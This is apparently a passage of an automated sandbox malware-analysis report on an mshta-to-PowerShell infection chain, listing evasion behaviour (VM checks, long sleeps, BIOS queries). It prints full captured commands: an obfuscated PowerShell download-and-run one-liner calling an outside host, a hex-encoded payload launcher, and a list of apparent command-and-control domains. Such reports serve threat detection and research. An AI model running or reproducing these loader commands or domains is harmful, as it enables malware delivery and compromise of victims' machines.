              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3309Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1190Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4666Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5076Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4508Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 364Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000004.00000002.2185543861.0000000002E69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5
              Source: mshta.exe, 00000000.00000002.2217844344.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@Z
              Source: powershell.exe, 00000016.00000002.3666329574.0000000002C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.2194620973.00000000074B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C
              Source: powershell.exe, 00000016.00000002.3663856176.0000000002C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: powershell.exe, 00000006.00000002.3511198513.0000000007618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043C160 LdrInitializeThunk,22_2_0043C160
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: powershell.exeString found in binary or memory: rapeflowwj.lat
              Source: powershell.exeString found in binary or memory: crosshuaht.lat
              Source: powershell.exeString found in binary or memory: sustainskelet.lat
              Source: powershell.exeString found in binary or memory: aspecteirs.lat
              Source: powershell.exeString found in binary or memory: energyaffai.lat
              Source: powershell.exeString found in binary or memory: necklacebudi.lat
              Source: powershell.exeString found in binary or memory: discokeyus.lat
              Source: powershell.exeString found in binary or memory: grannyejh.lat
              Source: powershell.exeString found in binary or memory: learningypr.click
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D8Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function htxbx($eywy){return -split ($eywy -replace '..', '0x$& ')};$smkl = htxbx('0f7a7222e17cfb1bb92172cfd10b1a0a35f2d236de6dd8d72d66b13fedb4d7cf6a19fa5e844d4ea4bda294b8324f3d40bbe3a32fa2f602f7eec40e64690703556f440e32e54db889f70490bfab024711ba156e7ef3961fb117120cba4913ea1e5d84acf6f55eba7c85c4edeae94ca6f88e91d98428ff8c02dea04eb6bc87cd7054da2412b8e711f8c1a790edd10e33300549b54953e993973674c4c6b322df9a94608d0e38bf1b68335f96bfdc063a0acac3f5674c4fb62fd421afd6b98437f6e9805448603b36d23a3100350c5424a024debee06efccb25bc5c2ed9e55f0ecdf8d82a5f5b3dde3dd01d9414613dc77c41ff3714787ca86bab941a84fa1697bfd67ae1442e846f4c0bcd12067b97f4c4761c790d99134685bd29d33eb13930e881348cceb581a392f1c4d3a954998de262a182e3ba192bc030972631dff7761b192a8e761fb393f15cec5503f481993757b7386a6defcb30893cb5510f8d9dfcd357a4503657121993c1da20619fc16a76829a33dc8bec2c25b345e40d743ae3fa6908a2256106edb3d401a541bbc6b63d25361ed338a28142aedfd2e2afa4224709fd2ab99578cad2d426ac01b625107469b2cfc6f80544cd0418a85df7b0034592f05c391690f1cb1f0e38c8c36984958b671982168da7fcd4ba7b76da7d1f52fbd0449c19027b914fde6de5faaa8cb6bf3f2a4274a8f5cceed4e85fe2bae43e079db816a326cfec5cf89e8bda8c7656d7abb681564558044e3e53669ee9994092f98411ab22f4889a3454bb3da6791db0f9c47830f4c06a5461824c4cd5af8028e685aaa4298897434d4728edcf0c7f21c0c4a773c3b93b8d500ad8247e5f882a6d58627b2848a409f59326ce2f3c94419453cbd81d72a42efc7700bf0f755ebf04e26adc65680a8ab81dc31b386413f68bdcdf1c0851eabfb0bbae9ccc1eec68f50a6c1e0d56474f854ae2306a1e2a3f8b94a0127dd3e51c4a536048ef14cdbf4b53a4e0c3eefefa4eed2cfe4541e54f2d69773940d13f9015002c0555fdc45820883ee8d40d25214d7139e6e12032c2bfe100c55fa40524f297c439b1a01353d2284c6cef35ac57e4400eda829b3e642624cdfa0bc2973809dc3345e9e56c2d1156147cea34b91cfff59896e54208b4cfd4207a17f7308c33d76c6413ab80c8d92695ddc466bc03f75d4179a7f1740b7a3e5a6c6d80f2fb8d74ffb55bd62e27d14a6503857d18986d8e19a1d8e35ad79fee150abe148d1b1c3e2d9d92c0b0bdf7de18dff55fd02b3212cc62401c8900caecaaade5361bfc807f5384eea46babda1f2032769cda2b56a725574ad832150b7026d06d0547d37743bd92a3253a6be7c4be7457307e6cde57b7840c35ecc06809a8fa8bf2351601ea6c1e3a025ba6cd107626bbf16cfed99355a4ac130ad2bef7d8e3b1d936dc4d667bae44082e02e0251c2355712885575901aefdc0139aa662d0b9c4acbf7403673b3c7ddf9e6e3ab15a286fc41c2d998ed91edd22436ba61dd3f3d745e36681712d110962fbd642a2cb901801e7af328696116a425ac0d6f7c474a297ebc5f89a3c52ee8db03de0214b816208ad47e4a4eb4864f152130aea847ad1031a9dded4248d031bce58b447eb0cc8763d2cdbf3348d053d54b42c707d6de3b3166fbf46cfb8f8ab676945a5d0b7ff4dd2daf54b40f69592d58649efe2b1f4cdadc627160733882c0c916de660976cbcd588f71a3d08308a76f8b82ed698b928d9b2c66911f8a2975942ac360069ac4b4d6c8c7e50e99b0cbd066a58477b4f336f9b12a5fe792e23ed42c6032b887e634abca3d08214b16e5953bbd4ffbd057e229e4b7a149d754e75229cd7b38cb289b484ae636864dafc411fea976653dc57f0e7b6ea81960ac0059db8fd2e23f7d92abd90cdc902bb6f71f0094ef783bb18777a34e0b7531a8c1a945811e9cb1db684d8
